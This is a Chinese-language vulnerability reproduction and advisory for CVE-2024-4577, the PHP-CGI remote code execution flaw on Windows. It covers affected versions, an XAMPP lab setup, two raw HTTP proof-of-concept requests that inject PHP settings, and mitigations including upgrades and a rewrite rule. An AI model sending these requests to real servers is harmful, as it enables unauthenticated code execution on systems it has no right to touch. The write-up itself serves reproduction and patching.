# PHP CGI Windows 平台远程代码执行漏洞 CVE-2024-4577 ## 漏洞描述 PHP 在设计时忽略 Windows 中对字符转换的 Best-Fit 特性,当 PHP 运行在 Window 平台且使用了如下语系(简体中文 936/繁体中文 950/日文 932 等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 保护,从而可在无需登陆的情况下执行任意 PHP 代码。 参考链接: - https://ti.qianxin.com/vulnerability/notice-detail/1020?type=risk ## 漏洞影响 主要影响 PHP 在 Windows 操作系统上的安装版本: ``` PHP 8.3 < 8.3.8 PHP 8.2 < 8.2.20 PHP 8.1 < 8.1.29 ``` 查看 Windows 操作系统默认编码(936 为中文 GBK,65001 为 UTF-8): ``` chcp ``` ## 环境搭建 ### 场景 1 - 在 CGI 模式下运行 PHP 在配置 Action 指令将相应的 HTTP 请求映射到 Apache HTTP Server 中的 PHP-CGI 可执行二进制文件时,可直接利用此漏洞。受影响的常见配置包括但不限于: ``` AddHandler cgi-script .php Action cgi-script "/cgi-bin/php-cgi.exe" ``` 或者 ``` SetHandler application/x-httpd-php-cgi Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe" ``` ### 场景 2 - 公开 PHP 二进制文件(默认的 XAMPP 配置) 常见场景包括但不限于: 1. 将 php.exe 或复制 php-cgi.exe 到/cgi-bin/目录。 2. 通过指令公开 PHP 目录 ScriptAlias,例如,在 XAMPP 默认配置 `httpd-xampp.conf` 中: ``` ScriptAlias /php-cgi/ "C:/xampp/php/" ``` [官网](https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.1.25/xampp-windows-x64-8.1.25-0-VS16-installer.exe) 搭建环境,php 版本 8.1.25。启动完成后,访问 `http://your-ip/dashboard` 即可看到 XAMPP 主页: ![](images/PHP%20CGI%20Windows%20平台远程代码执行漏洞%20CVE-2024-4577/image-20240612153916606.png) ## 漏洞复现 poc1: ``` GET /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 REDIRECT-STATUS:1 ``` ![](images/PHP%20CGI%20Windows%20平台远程代码执行漏洞%20CVE-2024-4577/image-20240612154037916.png) poc2: ``` POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1 Host: your-ip Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 REDIRECT-STATUS:1 ``` ![](images/PHP%20CGI%20Windows%20平台远程代码执行漏洞%20CVE-2024-4577/image-20240612154050322.png) ## 漏洞修复 ### 安全更新 目前官方已有可更新版本,建议受影响用户升级至最新版本: ``` PHP 8.3 >= 8.3.8 PHP 8.2 >= 8.2.20 PHP 8.1 >= 8.1.29 ``` 注:由于 PHP 8.0、PHP 7 和 PHP 5 的分支已终止使用,并且不再维护,服务器管理员可以参考“缓解方案”中的临时补丁建议。 官方下载地址: https://www.php.net/downloads.php ### 缓解方案 #### 1. 对于无法升级 PHP 的用户 以下重写规则可用于阻止攻击。需要注意的是,这些规则仅对繁体中文、简体中文和日语语言环境起到临时缓解作用。在实际操作中,仍然建议更新到补丁版本或迁移架构。 ``` RewriteEngine On RewriteCond %{QUERY_STRING} ^%ad [NC] RewriteRule .? - [F,L] ``` #### 2. 对于使用 XAMPP for Windows 的用户 如果确认不需要 PHP CGI 功能,可以通过修改以下 Apache HTTP Server 配置来避免受到该漏洞的影响: ``` C:/xampp/apache/conf/extra/httpd-xampp.conf ``` 找到相应的行: ``` ScriptAlias /php-cgi/"C:/xampp/php/" ``` 并将其注释掉: ``` # ScriptAlias /php-cgi/"C:/xampp/php/" ```